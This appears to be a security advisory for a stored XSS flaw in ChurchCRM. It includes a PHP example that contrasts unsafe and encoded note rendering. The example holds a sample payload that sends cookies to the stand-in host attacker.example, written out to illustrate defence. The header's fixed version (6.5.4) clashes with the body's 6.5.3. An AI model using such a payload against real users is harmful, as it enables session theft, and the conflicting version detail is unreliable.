Platform: php
Component: churchcrm
Fixed in: 6.5.4
CVE-2026-35574 describes a stored Cross-Site Scripting (XSS) vulnerability within ChurchCRM, an open-source church management system. This vulnerability allows authenticated users with note-adding permissions to inject malicious JavaScript code, impacting other users, including administrators. The vulnerability affects versions 6.5.0 through 6.5.2 and has been resolved in version 6.5.3.
An attacker who exploits this vulnerability can run arbitrary JavaScript in the browser of any ChurchCRM user who views the poisoned note. Because the payload is stored server-side, it fires every time the note is rendered, not just once. The realistic consequences are session hijacking and actions performed in the victim's context: if the victim is an administrator, the attacker can effectively act as an administrator, read or export member data, change permissions, or alter the application. Exploitation requires an authenticated account with note-adding rights, but in many deployments that permission is granted broadly, so the bar is low.
CVE-2026-35574 was publicly disclosed on 2026-04-07. No public proof-of-concept (PoC) code had been released at the time of writing; stored XSS payloads are easy to construct, so a PoC may appear. The vulnerability is not currently listed in CISA KEV. Given how little effort XSS exploitation takes and the sensitivity of the data involved, remediation should be prioritized.
Exploit Status
EPSS: 0.03% (9th percentile)
CISA SSVC
The primary mitigation for CVE-2026-35574 is to upgrade ChurchCRM to version 6.5.3 or later. If upgrading is not immediately feasible, the interim options are: apply context-appropriate output encoding wherever note content is rendered (input validation alone is not sufficient, because the stored value must be encoded for the HTML context at output time); put a Web Application Firewall (WAF) with XSS rules in front of the application as an additional, bypassable layer; and restrict note-adding permissions to personnel who actually need them, since the attack requires that permission.
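To make the "output encoding" interim measure concrete, the following is an added example written for this page, not ChurchCRM's own code: it contrasts a template that echoes a stored note body into HTML unchanged with one that encodes it at the output boundary. The note record, the payload and the function names are constructed for the illustration.

```php
<?php
// Added example (not ChurchCRM code): unsafe vs. encoded rendering of a
// stored note body. Sample data and helper names are constructed here.

declare(strict_types=1);

// Constructed sample of what a stored note could contain after a user with
// note-adding rights saved a script payload. The callback URL is fictional.
$note = [
    'id'   => 42,
    'text' => '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
];

// Vulnerable pattern: the stored value is concatenated into HTML verbatim,
// so every viewer's browser parses the attacker's markup and runs onerror.
function renderNoteUnsafe(array $note): string
{
    return '<div class="note" data-id="' . $note['id'] . '">' . $note['text'] . '</div>';
}

// Hardened pattern: encode for the HTML-text/attribute context at output.
// ENT_QUOTES covers both quote styles (needed inside attributes),
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string,
// and the charset is stated explicitly rather than inherited from ini settings.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderNoteSafe(array $note): string
{
    return '<div class="note" data-id="' . e((string) $note['id']) . '">'
        . e($note['text']) . '</div>';
}

// Simple regression check: the rendered page must never contain the raw
// stored markup. Useful as a unit test around any note-rendering template.
function containsRawPayload(string $html, string $storedText): bool
{
    return str_contains($html, $storedText);
}

echo "Unsafe: ", renderNoteUnsafe($note), PHP_EOL;
echo "Safe:   ", renderNoteSafe($note), PHP_EOL;
echo "Unsafe leaks raw payload: ", var_export(containsRawPayload(renderNoteUnsafe($note), $note['text']), true), PHP_EOL;
echo "Safe leaks raw payload:   ", var_export(containsRawPayload(renderNoteSafe($note), $note['text']), true), PHP_EOL;
```

The encoding must match the context the value lands in: `htmlspecialchars` is correct for HTML text and quoted attributes, but a value placed inside a `<script>` block, a URL, or an event handler attribute needs a different encoder. As defense in depth, a `Content-Security-Policy` that omits `'unsafe-inline'` from `script-src` blocks the inline `onerror` handler above even if an encoding gap remains, though legacy templates that rely on inline scripts may need adjusting first.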
Upgrade ChurchCRM to version 6.5.3 or later to mitigate the XSS vulnerability. Back up your database before upgrading. After upgrading, review the audit logs for any suspicious activity, and review existing notes for unexpected markup, since a payload stored before the upgrade stays in the database.
CVE-2026-35574 is a stored Cross-Site Scripting (XSS) vulnerability in ChurchCRM versions 6.5.0 through 6.5.2 that lets an authenticated user with note-adding permissions run arbitrary JavaScript in the browsers of other users who view the note.
You are affected if you are running ChurchCRM versions 6.5.0, 6.5.1, or 6.5.2. Upgrade to 6.5.3 to mitigate the risk.
Upgrade ChurchCRM to version 6.5.3 or later. Implement input validation and output encoding as an interim measure.
No active exploitation has been confirmed and the EPSS score is currently low, but stored XSS is straightforward to weaponize once a vulnerable instance is identified, so unpatched installations should be treated as exposed.
Refer to the ChurchCRM security advisories on their official website or GitHub repository for the latest information.